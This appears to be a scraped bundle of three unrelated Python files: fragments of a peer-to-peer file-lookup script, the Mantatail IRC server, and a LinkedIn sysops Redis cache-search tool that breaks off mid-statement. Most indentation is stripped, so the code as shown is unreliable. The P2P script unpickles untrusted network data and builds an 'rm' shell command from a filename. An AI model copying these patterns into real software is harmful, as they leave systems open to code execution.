# # numFiles = len(fileList)
# # for i in range(1, numFiles-1):
# # item = fileList[i].split(' ')
# # timeStamp = str(item[0]) + str(item[1]) + str(item[2])
# # fileName = str(item[3])
# # print fileName
# # import os
# # filename = "abcd"
# # command = "rm "+str(filename)+"-*"
# # os.system(command)
# supernodeIPList = ['10.196.7.181']
# class Node:
# def __init__(self, IPAddr, liveStatus) :
# self.IPAddr = IPAddr
# self.liveStatus = liveStatus
# self.fileMap = {}
# def __eq__(self, other):
# if not isinstance(other, Node):
# # don't attempt to compare against unrelated types
# return NotImplemented
# return self.IPAddr == other.IPAddr
# class File:
# def __init__(self, name, h1, h2, h3, h4):
#         self.name = name
# self.h1 = h1
# self.h2 = h2
# self.h3 = h3
# self.h4 = h4
# # containing objects of Node
# childNodes = {} #{IPAddr->Node}
# IPAddr = '10.196.7.181'
# childNodes[IPAddr].fileMap['1'] = File('1', '2', '3', '4', '5')
# childNodes[IPAddr].fileMap['2'] = File('2', '2', '3', '4', '5')
# childNodes[IPAddr].fileMap['3'] = File('3', '2', '3', '4', '5')
# function to recv an object via TCP socket
'''
def recvObj(port, IPAddr):
TCP_IP = IPAddr
TCP_PORT = port
BUFFER_SIZE = 1024
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((TCP_IP, TCP_PORT))
tcpsock.settimeout(100)
try:
tcpsock.listen(5)
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(1024)
data = pickle.loads(msg)
tcpsock.close()
return data
except socket.timeout as e:
print "files addition socket timeout : " + TCP_IP
tcpsock.close()
return
tcpsock.close()
#function to send an object from TCP sockets
def sendObj(port, IPAddr, obj):
TCP_IP = str(IPAddr)
TCP_PORT = port
BUFFER_SIZE = 1024
#convert object to serial stream
msg = pickle.dumps(obj)
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
p.connect((str(TCP_IP), TCP_PORT))
p.send(msg)
p.close()
except socket.error , exc:
print "Error Caught : ",exc
def showFile():
result = []
fileCache = ['123','ag','jydrstgr','asgf','efger','46sdf','asdf']
for x in fileCache:
result.append(x)
sendObj(9001, "10.196.7.181", result)
filename = recvObj(9002, "10.196.7.181")
print filename
showFile()
'''
# bashCommand = "hostname -I | awk '{print $1}'"
# IPAddr = subprocess.check_output(['bash','-c', bashCommand])
# sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
# sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# sNode.bind(("", 37020))
# while True:
# # continuously listen for broadcast msgs
# data, addr = sNode.recvfrom(1024)
# if data != '':
# sNode.sendto(IPAddr, addr)
# print "TU mc ",data
# import socket
# import subprocess
# import threading
# import os
# children = []
# def assignSuperNode():
# # accept requests to become superNode
# bashCommand = 'hostname -I | awk \'{print $1}\''
# IPAddr = subprocess.check_output(['bash','-c', bashCommand])
# sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
# sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# sNode.bind(("", 37020))
# while True:
# # continuously listen for broadcast msgs
# data, addr = sNode.recvfrom(1024)
# if data != '':
# print data
# if __name__ == "__main__":
# # print ID of current process
# print("ID of process running main program: {}".format(os.getpid()))
# # print name of main thread
# # print("Main thread name: {}".format(threading.main_thread().name))
# # creating threads
# t1 = threading.Thread(target=assignSuperNode, name='t1')
# # starting threads
# t1.start()
# # wait until all threads finish
# t1.join()
# Determine this machine's primary IP address.
bashCommand = "hostname -I | awk '{print $1}'"
myIPAddr = subprocess.check_output(['bash','-c', bashCommand])
myIPAddr = myIPAddr.split('\n')
myIPAddr = myIPAddr[0]
print "____"+str(myIPAddr)+"___"
# Function to receive a pickled object over a TCP socket.
def recvObj(port):
TCP_IP = myIPAddr
TCP_PORT = port
BUFFER_SIZE = 1024
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((TCP_IP, TCP_PORT))
tcpsock.settimeout(10)
try:
tcpsock.listen(5)
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(1024)
data = pickle.loads(msg)
tcpsock.close()
return data
except socket.timeout as e:
print "files addition socket timeout : " + TCP_IP
tcpsock.close()
return
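# Note: recv(1024) above only reads a single chunk, so pickled objects larger
# than 1024 bytes would be truncated. A hedged sketch of a loop that drains the
# socket instead (illustrative helper, not used by the original code):
def recvAll(conn, bufsize=1024):
    chunks = []
    while True:
        chunk = conn.recv(bufsize)
        if not chunk:
            break
        chunks.append(chunk)
    return ''.join(chunks)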
#function to send an object from TCP sockets
def sendObj(port, IPAddr, obj):
TCP_IP = str(IPAddr)
TCP_PORT = port
BUFFER_SIZE = 1024
#convert object to serial stream
msg = pickle.dumps(obj)
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
p.connect((str(TCP_IP), TCP_PORT))
p.send(msg)
p.close()
    except socket.error as exc:
print "Error Caught : ",exc
serverAddrPort = ("", 9090)
UDPClientSocket = socket.socket(family = socket.AF_INET, type = socket.SOCK_DGRAM)
UDPClientSocket.sendto('findFile', serverAddrPort)
sendObj(9002,myIPAddr, 1)
ipList = recvObj(9003)
|
server.py
|
"""
Represents the core of the server, with its main functionality and classes.
All communication between server and client is encoded with latin-1.
This ensures compatibility regardless of what encoding is used client-side.
"""
from __future__ import annotations
import socket
import threading
import queue
import fnmatch
import json
from datetime import datetime
from typing import Dict, Optional, List, Set, Tuple
import commands, errors
MANTATAIL_VERSION = "0.0.1"
SERVER_STARTED = datetime.today().ctime()
PING_TIMER_SECS = 180
CAP_LS: List[str] = ["away-notify", "cap-notify"]
ISUPPORT = {"NICKLEN": "16", "PREFIX": "(o)@", "CHANTYPES": "#", "TARGMAX": "PRIVMSG:1,JOIN:1,PART:1,KICK:1"}
class State:
"""Keeps track of existing channels & connected users."""
def __init__(self, motd_content: Optional[Dict[str, List[str]]], port: int) -> None:
"""
Attributes:
- lock: Locks the state of the server to avoid modifications
to iterables during iteration.
- supported_modes: These are the channel and user modes that the server supports.
Modes are divided into four types (A, B, C, D). Depending on the mode type,
they either must take a parameter, or they must not.
- Channel modes are set on channels to modify their functionality.
- User modes are set on users to change how they are affected by different
commands and features. All user modes are of type D (they never take a parameter).
supported_modes also contains "prefix", which are channel modes set on a user (ex. +o, +v).
More info:
https://modern.ircdocs.horse/#channel-mode
https://modern.ircdocs.horse/#user-modes
"""
self.lock = threading.Lock()
self.channels: Dict[str, Channel] = {}
self.connected_users: Dict[str, UserConnection] = {}
self.port = port
self.motd_content = motd_content
# Supported Modes:
# b: Ban/Unban user from channel (channel)
# i: Make user invisible, and hide them from e.g WHO, NAMES commands.
# o: Set/Unset channel operator (channel)
# t: Only operator can set channel topic (channel)
self.supported_modes: Dict[str, List[str]] = {"A": ["b"], "B": [], "C": [], "D": ["i", "t"], "PREFIX": ["o"]}
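        # Illustrative MODE lines (not sent from this module): "MODE #chan +b x!*@*"
        # sets the type-A channel mode "b" with a parameter, while "MODE nick +i"
        # sets the parameterless type-D user mode "i".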
def find_user(self, nick: str) -> Optional[UserConnection]:
"""
Looks for a connected user and returns its user object.
Returns None if user doesn't exist.
"""
try:
return self.connected_users[nick.lower()]
except KeyError:
return None
def find_channel(self, channel_name: str) -> Optional[Channel]:
"""
Looks for an existing channel and returns its channel object.
        Returns None if channel doesn't exist.
"""
try:
return self.channels[channel_name.lower()]
except KeyError:
return None
def delete_user(self, nick: str) -> None:
"""
Removes a user from all channels they are connected to,
thereafter removes user from connected users.
Note: This does not actually disconnect the user from the server.
To disconnect the user, a tuple (None, disconnect_reason: str) must be put in their send queue.
"""
user = self.find_user(nick)
assert user is not None
for channel in self.channels.values():
if user in channel.users:
channel.users.discard(user)
del self.connected_users[nick.lower()]
def delete_channel(self, channel_name: str) -> None:
"""
Removes a channel from server.
"""
del self.channels[channel_name.lower()]
class ConnectionListener:
"""Starts the server and listens for incoming connections from clients."""
def __init__(self, port: int, motd_content: Optional[Dict[str, List[str]]]) -> None:
self.host = ""
self.port = port
self.listener_socket = socket.socket()
self.listener_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listener_socket.bind((self.host, port))
self.listener_socket.listen(5)
self.state = State(motd_content, self.port)
def run_server_forever(self) -> None:
"""
Accepts incoming connections from clients.
Starts a separate thread to handle each connection.
"""
print(f"Mantatail running (port {self.port})")
while True:
(user_socket, user_address) = self.listener_socket.accept()
print("Got connection from", user_address)
client_thread = threading.Thread(
target=CommandReceiver, args=[self.state, user_address[0], user_socket], daemon=True
)
client_thread.start()
class CommandReceiver:
"""
Receives commands/messages from the client, parses them, and sends them to the appropriate
handler function.
IRC Messages are formatted "bytes(COMMAND parameters\r\n)"
Most IRC clients use "\r\n" line endings, but "\n" is accepted as well (used by e.g. netcat).
Ex: b"JOIN #foo\r\n"
Ex: b"PRIVMSG #foo :This is a message\r\n"
"""
def __init__(self, state: State, user_host: str, user_socket: socket.socket) -> None:
self.state = state
self.user_host = user_host
self.user_socket = user_socket
self.user = UserConnection(state, user_host, user_socket)
self.disconnect_reason: str = ""
self.recv_loop()
def recv_loop(self) -> None:
"""
Parses incoming messages from the client and sends them to the appropriate
"handle_" function.
To handle a command FOO, a function named handle_foo() in commands.py is called.
For example, "PRIVMSG #foo :this is a message\r\n" results in a call like this:
commands.handle_privmsg(state, user, ["#foo", "this is a message"])
The function call is done with getattr().
getattr(commands, "handle_join") is equivalent to commands.handle_join.
More info: https://docs.python.org/3/library/functions.html#getattr
"""
try:
while True:
request = self.receive_messages()
if request is None:
return # go to "finally:"
decoded_command = request.decode("latin-1")
for line in split_on_new_line(decoded_command)[:-1]:
(command, args) = self.parse_received_command(line)
command_lower = command.lower()
handler_function = "handle_" + command_lower
if self.user.nick == "*" or self.user.user_message is None or not self.user.motd_sent:
if command_lower == "quit":
self.disconnect_reason = "Client quit"
return # go to "finally:"
else:
self.handle_user_registration(command_lower, args)
if (
self.user.nick != "*"
and self.user.user_message is not None
and not self.user.capneg_in_progress
):
self.user.on_registration()
else:
try:
# ex. "command.handle_nick" or "command.handle_join"
call_handler_function = getattr(commands, handler_function)
except AttributeError:
errors.unknown_command(self.user, command)
else:
with self.state.lock:
call_handler_function(self.state, self.user, args)
if command_lower == "quit":
return
finally:
self.user.send_que.put((None, self.disconnect_reason))
def receive_messages(self) -> bytes | None:
"""
Receives one or more lines from the client as bytes and returns them to recv_loop().
It will receive until the received bytes end with "\n", which indicates that everything
the client has currently sent has been received.
None is returned if the user disconnects.
Also starts the user's ping timer, which will send a PING message to the client
after a certain time of inactivity.
        The PING message verifies that the user still has an open connection to the server.
"""
request = b""
while not request.endswith(b"\n"):
self.user.start_ping_timer()
try:
request_chunk = self.user_socket.recv(4096)
except OSError as err:
self.disconnect_reason = err.strerror
return None
finally:
self.user.ping_timer.cancel()
if request_chunk:
request += request_chunk
else:
self.disconnect_reason = "Remote host closed the connection"
return None
return request
def parse_received_command(self, msg: str) -> Tuple[str, List[str]]:
"""
Parses the user command by separating the command (e.g "join", "privmsg", etc.) from the
arguments.
If a parameter contains spaces, it must start with ':' to be interpreted as one parameter.
If the parameter does not start with ':', it will be cut off at the first space.
Ex:
- "PRIVMSG #foo :This is a message\r\n" will send "This is a message"
- "PRIVMSG #foo This is a message\r\n" will send "This"
"""
split_msg = msg.split(" ")
for num, arg in enumerate(split_msg):
if arg.startswith(":"):
parsed_msg = split_msg[:num]
parsed_msg.append(" ".join(split_msg[num:])[1:])
command = parsed_msg[0]
return command, parsed_msg[1:]
command = split_msg[0]
return command, split_msg[1:]
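    # Parsing examples (illustrative):
    #   parse_received_command("PRIVMSG #foo :This is a message")
    #     -> ("PRIVMSG", ["#foo", "This is a message"])
    #   parse_received_command("PRIVMSG #foo This is a message")
    #     -> ("PRIVMSG", ["#foo", "This", "is", "a", "message"])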
def handle_user_registration(self, command: str, args: List[str]) -> None:
"""
Parses messages from the client before they have registered (provided the server
with their nickname (NICK) and username (USER)).
This limits what commands the user can send before registering.
"""
if command == "user":
if len(args) < 4:
errors.not_enough_params(self.user, command.upper())
else:
self.user.user_message = args
self.user.user_name = args[0]
self.user.real_name = args[3]
elif command == "nick":
commands.handle_nick(self.state, self.user, args)
elif command == "pong":
commands.handle_pong(self.state, self.user, args)
elif command == "cap":
commands.handle_cap(self.state, self.user, args)
else:
errors.not_registered(self.user)
class UserConnection:
"""
Represents the connection between server & client.
Format examples:
- Nick: Alice
- User message: AliceUsr 0 * Alice's Real Name
- Username: AliceUsr
    - User mask: Alice!AliceUsr@127.0.0.1 (Nick!Username@Host)
Usually the nick is used when referring to the user.
Send Queue:
A send queue and a separate thread are used for sending messages to the client.
This helps with error handling, and even if someone has a slow internet connection,
other people don't have to wait when a message is sent to several users with a loop.
All messages are sent as a tuple formatted as (message, prefix).
Prefixes are either ":mantatail" or ":sender.user_mask"
A Tuple containing (None, disconnect_reason: str) indicates a QUIT command and closes the connection to the client.
"""
def __init__(self, state: State, host: str, socket: socket.socket):
self.state = state
self.socket = socket
self.host = host
self.nick = "*"
self.user_message: Optional[List[str]] = None
self.user_name: Optional[str] = None
self.real_name: Optional[str] = None
self.modes = {"i"}
self.away: Optional[str] = None # None = user not away, str = user away
self.send_que: queue.Queue[Tuple[str, str | None] | Tuple[None, str]] = queue.Queue()
self.que_thread = threading.Thread(target=self.send_queue_thread)
self.que_thread.start()
self.cap_list: Set[str] = set()
self.motd_sent = False
self.capneg_in_progress = False
self.pong_received = False
def get_user_mask(self) -> str:
"""Generates and returns a user mask (Nick!Username@Host)."""
return f"{self.nick}!{self.user_name}@{self.host}"
def get_prefix(self, channel: Channel) -> str:
"""
Returns appropriate user prefix for a specific channel.
("@" for channel operator, "" for other users).
"""
if self in channel.operators:
return "@"
else:
return ""
def on_registration(self) -> None:
"""
After a user has registered on the server by providing a nickname (NICK) and a username (USER),
several messages are sent to the client with information about the server.
"""
commands.rpl_welcome(self)
commands.rpl_yourhost(self, self.state)
commands.rpl_created(self)
commands.rpl_myinfo(self, self.state)
commands.rpl_isupport(self)
commands.motd(self.state.motd_content, self)
self.motd_sent = True
def send_queue_thread(self) -> None:
"""Queue on which the client receives messages from server."""
while True:
(message, prefix) = self.send_que.get()
if message is None:
disconnect_reason = prefix
quit_message = f"QUIT :Quit: {disconnect_reason}"
with self.state.lock:
self.queue_quit_message_for_other_users(quit_message)
if self.nick != "*":
self.state.delete_user(self.nick)
try:
# Can be slow, if user has bad internet. Don't do this while holding the lock.
if self.nick == "*" or not self.user_message:
self.send_string_to_client(quit_message, None)
else:
self.send_string_to_client(quit_message, self.get_user_mask())
except OSError:
pass
close_socket_cleanly(self.socket)
return
else:
try:
self.send_string_to_client(message, prefix)
except OSError as err:
disconnect_reason = err.strerror
self.send_que.put((None, disconnect_reason))
def queue_quit_message_for_other_users(self, quit_message: str) -> None:
"""Alerts all other users that the User has QUIT and closed the connection to the server."""
receivers = self.get_users_sharing_channel()
for channel in self.state.channels.values():
channel.operators.discard(self)
for receiver in receivers:
receiver.send_que.put((quit_message, self.get_user_mask()))
def get_users_sharing_channel(self) -> Set[UserConnection]:
"""Returns all users of all channels that this user has joined."""
receivers = set()
for channel in self.state.channels.values():
if self in channel.users:
for usr in channel.users:
if usr != self:
receivers.add(usr)
return receivers
def send_string_to_client(self, message: str, prefix: Optional[str]) -> None:
"""
Send a string to the client, without using the send queue.
In most cases, you should put a message to the send queue instead of using this method directly.
"""
try:
if prefix is None:
message_as_bytes = bytes(f"{message}\r\n", encoding="latin-1")
else:
message_as_bytes = bytes(f":{prefix} {message}\r\n", encoding="latin-1")
self.socket.sendall(message_as_bytes)
except OSError:
return
def start_ping_timer(self) -> None:
"""
Starts a timer on a separate thread that, when finished, sends a PING message to the client
to establish that the client still has an open connection to the server.
"""
self.ping_timer = threading.Timer(PING_TIMER_SECS, self.queue_ping_message)
self.ping_timer.start()
def queue_ping_message(self) -> None:
"""
Puts a PING message in the client's send queue, and starts a new timer waiting for the
expected PONG response from the client.
        This is done to verify that the client still has an open connection to the server.
Ex:
Sends "PING :mantatail"
Expected response: "PONG :mantatail"
"""
self.send_que.put(("PING :mantatail", None))
threading.Timer(240, self.assert_pong_received).start()
def assert_pong_received(self) -> None:
"""
Checks if the client has sent a PONG response to the server's PING message.
If no PONG response has been received, the server closes the connection to the client.
"""
if not self.pong_received:
disconnect_reason = "Ping timeout..."
self.send_que.put((None, disconnect_reason))
else:
self.pong_received = False
class Channel:
"""
An existing channel on the server.
Contains all channel-specific actions and modes.
"""
def __init__(self, channel_name: str, user: UserConnection) -> None:
self.name = channel_name
self.topic: Optional[Tuple[str, str]] = None # (Topic, Topic author)
self.modes: Set[str] = {"t"} # See State __init__ for more info on letters.
self.operators: Set[UserConnection] = set()
self.users: Set[UserConnection] = set()
self.ban_list: Dict[str, str] = {}
self.operators.add(user)
def set_topic(self, user: UserConnection, topic: str) -> None:
if not topic:
self.topic = None
else:
self.topic = (topic, user.nick)
def send_topic_to_user(self, user: UserConnection) -> None:
if self.topic is None:
message = f"331 {user.nick} {self.name} :No topic is set."
user.send_que.put((message, "mantatail"))
else:
topic_message = f"332 {user.nick} {self.name} :{self.topic[0]}"
author_message = f"333 {user.nick} {self.name} :{self.topic[1]}"
user.send_que.put((topic_message, "mantatail"))
user.send_que.put((author_message, "mantatail"))
def queue_message_to_chan_users(self, message: str, sender: UserConnection, send_to_self: bool = True) -> None:
"""
Puts a message in the send queue of all users on the channel.
In cases where the message should not be sent to self (ex. PRIVMSG), the method
is called with send_to_self = False.
"""
for usr in self.users:
if usr != sender or send_to_self:
usr.send_que.put((message, sender.get_user_mask()))
def check_if_banned(self, target: str) -> bool:
"""
Checks if the user mask provided in a MODE +b (ban) command matches a
user mask that is already in the channel's ban list.
Wildcards "*" are used to cover any set of characters.
Ex. If the ban list contains "*!Bar@Baz", "Foo!Bar@Baz" will be considered a match.
"""
return any(fnmatch.fnmatch(target, ban_mask) for ban_mask in self.ban_list.keys())
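    # e.g. with ban_list = {"*!Bar@Baz": "..."}, check_if_banned("Foo!Bar@Baz")
    # returns True, since fnmatch treats "*" as a wildcard.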
def close_socket_cleanly(sock: socket.socket) -> None:
"""
Ensures that the connection to a client is closed cleanly without errors and with no data loss.
Use this instead of the .close() method.
"""
# The code is based on this blog post:
# https://blog.netherlabs.nl/articles/2009/01/18/the-ultimate-so_linger-page-or-why-is-my-tcp-not-reliable
try:
sock.shutdown(socket.SHUT_WR)
sock.settimeout(10)
sock.recv(1) # Wait for client to close the connection
except OSError:
# Possible causes:
# - Client decided to keep its connection open for more than 10sec.
# - Client was already disconnected.
# - Probably something else too that I didn't think of...
pass
sock.close()
def split_on_new_line(string: str) -> List[str]:
"""Splits a message received by a client on "\r\n" (most IRC clients) or "\n" (e.g. Netcat)."""
if string.endswith("\r\n"):
return string.split("\r\n")
else:
return string.split("\n")
def get_motd_content_from_json() -> Optional[Dict[str, List[str]]]:
"""Loads the Message of the Day file.
Returns None if the file is not found.
"""
try:
with open("./resources/motd.json", "r") as file:
motd_content: Dict[str, List[str]] = json.load(file)
return motd_content
except FileNotFoundError:
return None
if __name__ == "__main__":
ConnectionListener(6667, get_motd_content_from_json()).run_server_forever()
|
cache_extractor.py
|
#!/usr/bin/python2.6
# filesource \$HeadURL: svn+ssh://csvn@esv4-sysops-svn.corp.linkedin.com/export/content/sysops-svn/cfengine/trunk/generic_cf-agent_policies/config-general/manage_usr_local_admin/CacheExtractor.py $
# version \$Revision: 123922 $
# modifiedby \$LastChangedBy: msvoboda $
# lastmodified \$Date: 2014-06-16 15:49:08 -0400 (Mon, 16 Jun 2014) $
# (c) [2013] LinkedIn Corp. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import os
import sys
import subprocess
import signal
import redis
import hashlib
import threading
import Queue
import platform
sys.path.append("/usr/local/admin")
import sysopsapi.redis_finder
import seco.range
import bz2
# System identification
import __main__
import uuid
import pwd
import json
class CacheExtractor(sysopsapi.redis_finder.RedisFinder):
def __init__(self,
scope=None,
site=None,
range_servers=None,
range_query=None,
file=None,
search_string=None,
return_randomized_servers=True,
list_files=False,
prefix_hostnames=False,
verbose=False,
cost=False,
md5sum=False,
stat=False,
wordcount=False,
contents=False,
time=False):
self._cm_conf = open('/etc/cm.conf', 'r')
self._redis_corelist = []
self._object_store = {}
self._named_object_results = {}
self._gold = {}
self._number_of_results = 0
self._verbose = verbose
self._cost = cost
self._list_files = list_files
self._md5sum = md5sum
self._contents = contents
self._stat = stat
self._wordcount = wordcount
self._time = time
self._search_string = search_string
self._prefix_hostnames = prefix_hostnames
self._return_randomized_servers = return_randomized_servers
self._file = file
# We used to use redis database 0, which was plain text. Now, bz2
# compression populates database 1.
self._database = 1
# value at array index 0 is the contents of the file itself.
# value at array index 1 is the md5sum of the file
# value at array index 2 is the os.stat contents of the file.
# value at array index 3 is the wordcount of the file
# value at array index 4 is the cache insertion time of the file
self._index_contents = 0
self._index_md5sum = 1
self._index_stat = 2
self._index_wordcount = 3
self._index_time = 4
self._range_servers = []
if range_servers is not None:
for rs in range_servers.split(','):
self._range_servers.append(rs)
if scope:
self._scope = scope
else:
self._scope = 'local'
if site:
self._site = site
self._scope = 'site'
else:
self._site = self.discover_site()
if range_query:
self._range_query = range_query
            # If the user specified a --site on the CLI, preserve that option;
            # global queries are expensive to search against. If the data isn't
            # found on the site specified on the CLI, we throw an exception.
            # Otherwise, execution is much faster.
if self._scope != 'site':
self._scope = 'global'
else:
self._range_query = None
if self._list_files:
self._search_string = '/'
if self._search_string:
if "#" not in self._search_string:
self._search_string = '*' + self._search_string + '*'
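                # e.g. (illustrative) searching for "passwd" yields the redis key
                # pattern "*passwd*", while "host#/etc/passwd" is used verbatim.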
# The below statement fires off the work in RedisFinder.RedisServes to generate our corelist.
# The CacheExtractor object inherits functions in RedisFinder where
# this work is being processed.
self.query_range_for_redis_corelist()
# O/S information that gets sent to each MPS for each search.
self._user = pwd.getpwuid(os.getuid())
self._uuid = str(uuid.uuid4())
self._cwd = os.getcwd()
import time
if ".linkedin.com" not in platform.node():
self._hostname = platform.node() + ".linkedin.com"
else:
self._hostname = platform.node()
self.info = {}
self.info['redis_servers'] = {}
self.info['query'] = {}
self.info['totals'] = {}
self.info['totals']['total_bytes_redis_cache_downloaded'] = 0
self.info['totals']['total_bytes_results_decompressed'] = 0
self.info['totals']['total_keys_matched'] = 0
self.info['totals']['total_time_start'] = time.time()
self.info['totals']['total_time_elapsed'] = None
self.info['query']['pw_name'] = self._user.pw_name
self.info['query']['pw_uid'] = self._user.pw_uid
self.info['query']['pw_gid'] = self._user.pw_gid
self.info['query']['pw_gecos'] = self._user.pw_gecos
self.info['query']['pw_dir'] = self._user.pw_dir
self.info['query']['pw_shell'] = self._user.pw_shell
self.info['query']['utility'] = __main__.__file__
self.info['query']['self._scope'] = self._scope
self.info['query']['self._range_query'] = self._range_query
self.info['query']['self._database'] = self._database
self.info['query']['self._redis_corelist'] = self._redis_corelist
self.info['query']['self._site'] = self._site
self.info['query']['self._list_files'] = self._list_files
self.info['query']['self._file'] = self._file
self.info['query']['self._prefix_hostnames'] = self._prefix_hostnames
self.info['query']['self._md5sum'] = self._md5sum
self.info['query']['self._contents'] = self._contents
self.info['query']['self._stat'] = self._stat
self.info['query']['self._wordcount'] = self._wordcount
self.info['query']['self._time'] = self._time
self.info['query']['self._search_string'] = self._search_string
self.info['query'][
'self._return_randomized_servers'] = self._return_randomized_servers
self.info['query']['self._range_servers'] = self._range_servers
self.info['query']['self._redis_corelist'] = self._redis_corelist
self.info['query']['self._hostname'] = self._hostname
self.info['query']['self._cwd'] = self._cwd
if self._verbose:
for key in sorted(self.info['query'].iterkeys()):
print "(+) CacheExtractor __init__ {0} {1}".format(key, self.info['query'][key])
# Do actual work.
if self._search_string:
self.list_of_matching_named_objects()
self.extract_named_objects()
# If requested, query how expensive the given query was.
if self._cost:
self._gold = None
self.display_cost_of_cache()
##########################################################################
def display_cost_of_cache(self):
print json.dumps(self.info['totals'], indent=3, sort_keys=True)
print json.dumps(self.info['redis_servers'], indent=3, sort_keys=True)
##########################################################################
def print_redis_server_information(self):
for redis_server in self._redis_corelist:
redis_connection = redis.Redis(
host=redis_server, port=6379, db=self._database, socket_timeout=5, charset='utf-8', errors='strict')
redis_info = redis_connection.info()
for key in redis_info.iterkeys():
if self._prefix_hostnames:
print redis_server.ljust(30) + "\t" + key.ljust(50) + "\t" + str(redis_info[key]).ljust(80).strip()
else:
print key.ljust(50) + str(redis_info[key]).rjust(50).strip()
##########################################################################
def list_of_matching_named_objects(self):
"""
Populates a dictionary containing a list of named_objects per redis server. If range query has been passed on the CLI,
then we only look for named_objects from hosts within that range. Otherwise, we go 'global' in scope, and return named_objects
for all hosts. Range is actually a restrictive operation here, not an inclusive one.
"""
## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ##
def threaded_object_finder(queue, redis_server):
try:
redis_connection = redis.Redis(
host=redis_server, port=6379, db=self._database, socket_timeout=5, charset='utf-8', errors='strict')
try:
queue.put(
sorted(redis_connection.keys(self._search_string)))
except Exception, e:
print "CacheExtractor.list_of_matching_named_objects().threaded_object_finder() Exception " + str(e)
os._exit(1)
except redis.exceptions.ResponseError, e:
print "CacheExtractor.list_of_matching_named_objects().threaded_object_finder() Exception " + str(e)
os._exit(1)
## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ##
queue = Queue.Queue()
threads = []
for redis_server in self._redis_corelist:
thread = threading.Thread(
target=threaded_object_finder, args=(queue, redis_server))
threads.append(thread)
thread.start()
self._named_object_results[redis_server] = queue.get()
for named_object in self._named_object_results[redis_server]:
self._number_of_results += 1
if self._verbose:
print "(+) CacheExtractor.list_of_matching_named_objects() named_object " + named_object + " discovered from redis server " + redis_server
for thread in threads:
thread.join()
if self._number_of_results == 0:
            raise Exception('''No results were found from the search. Please try your search again. Use --list-files to get an idea of what objects exist in the cache.
It's possible that you are in the wrong scope. This utility uses a local scope by default.
You might want to be using --scope site, --scope global, or --site <datacenter> to adjust your scope.
https://iwww.corp.linkedin.com/wiki/cf/display/IST/Extracting+the+sysops+cache+for+fun+and+profit#Extractingthesysopscacheforfunandprofit-Levelsofscope
If executing extract_sysops_cache.py, use --help for some basic examples of scope.''')
# When we insert keys into the cache, we insert with <hostname>$<uuid>. At the end of insertion, we rename the key from this uuid to the actual key name.
# The actual key name will be in the form <hostname>#<filename>
# This allows the operation to be atomic. We can either search and find the object, or we can't. Before, there was a race condition where we could be extracting
        # the key at the exact moment of insertion. If we don't find a key with "#" in the name of the key, remove it from results. We shouldn't be searching against
        # objects that don't contain "#" in the keyname.
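        # Illustrative key shapes (hostname hypothetical):
        #   mid-insertion: "app01.prod$9f1c-..."      (uuid-suffixed, filtered out below)
        #   completed:     "app01.prod#/etc/passwd"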
temp_results = {}
for redis_server in self._redis_corelist:
temp_results[redis_server] = []
for named_object in self._named_object_results[redis_server]:
if "#" in named_object:
temp_results[redis_server].append(named_object)
else:
if self._verbose:
print "(+) CacheExtractor.list_of_matching_named_objects() named_object " + named_object + " removed from redis server " + redis_server
self._named_object_results[
redis_server] = temp_results[redis_server]
machines = []
if self._range_query:
for range_server in self._range_servers:
if self._verbose:
print "(+) CacheExtractor.list_of_matching_named_objects() range_server is ", range_server
print "(+) CacheExtractor.list_of_matching_named_objects() self.range_query is ", self._range_query
try:
range_connection = seco.range.Range(range_server)
machines = range_connection.expand(self._range_query)
if machines:
break
except seco.range.RangeException:
print "(+) CacheExtractor.list_of_matching_named_objects() range query invalid"
sys.exit(1)
if self._file:
try:
if machines:
if self._file == "-":
boxes = sys.stdin.readlines()
else:
boxes = open(self._file, 'r').readlines()
for box in boxes:
machines.append(box)
else:
if self._file == "-":
machines = sys.stdin.readlines()
else:
machines = open(self._file, 'r').readlines()
except Exception, e:
print "The file " + self._file + " can not be opened. Does it exist? Exiting."
sys.exit(1)
# Both range queries and reading from a file are both restrictive
# actions. We only return objects if we match from either source.
if self._range_query or self._file:
temp_results = {}
for redis_server in self._redis_corelist:
temp_results[redis_server] = []
for named_object in self._named_object_results[redis_server]:
for machine in machines:
if machine.strip() in named_object:
temp_results[redis_server].append(named_object)
self._named_object_results[
redis_server] = temp_results[redis_server]
##########################################################################
def extract_named_objects(self):
threads = []
for redis_server in self._redis_corelist:
thread = threading.Thread(
target=self.threaded_object_extractor, args=(redis_server,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
# Update totals for all cost hitting all redis servers.
for redis_server in self._redis_corelist:
self.info['totals']['total_bytes_redis_cache_downloaded'] += self.info[
'redis_servers'][redis_server][self._uuid]['bytes_redis_cache_downloaded']
self.info['totals']['total_bytes_results_decompressed'] += self.info[
'redis_servers'][redis_server][self._uuid]['bytes_results_decompressed']
self.info['totals'][
'total_keys_matched'] += self.info['redis_servers'][redis_server][self._uuid]['keys_matched']
import time
self.info['totals']['total_time_finished'] = time.time()
self.info['totals']['total_time_elapsed'] = self.info['totals'][
'total_time_finished'] - self.info['totals']['total_time_start']
self.info['totals']['total_bytes_per_second'] = int(self.info['totals'][
'total_bytes_redis_cache_downloaded'] / self.info['totals']['total_time_elapsed'])
self.info['totals']['total_human_readable_mb_redis_cache_downloaded'] = '%.3f' % (
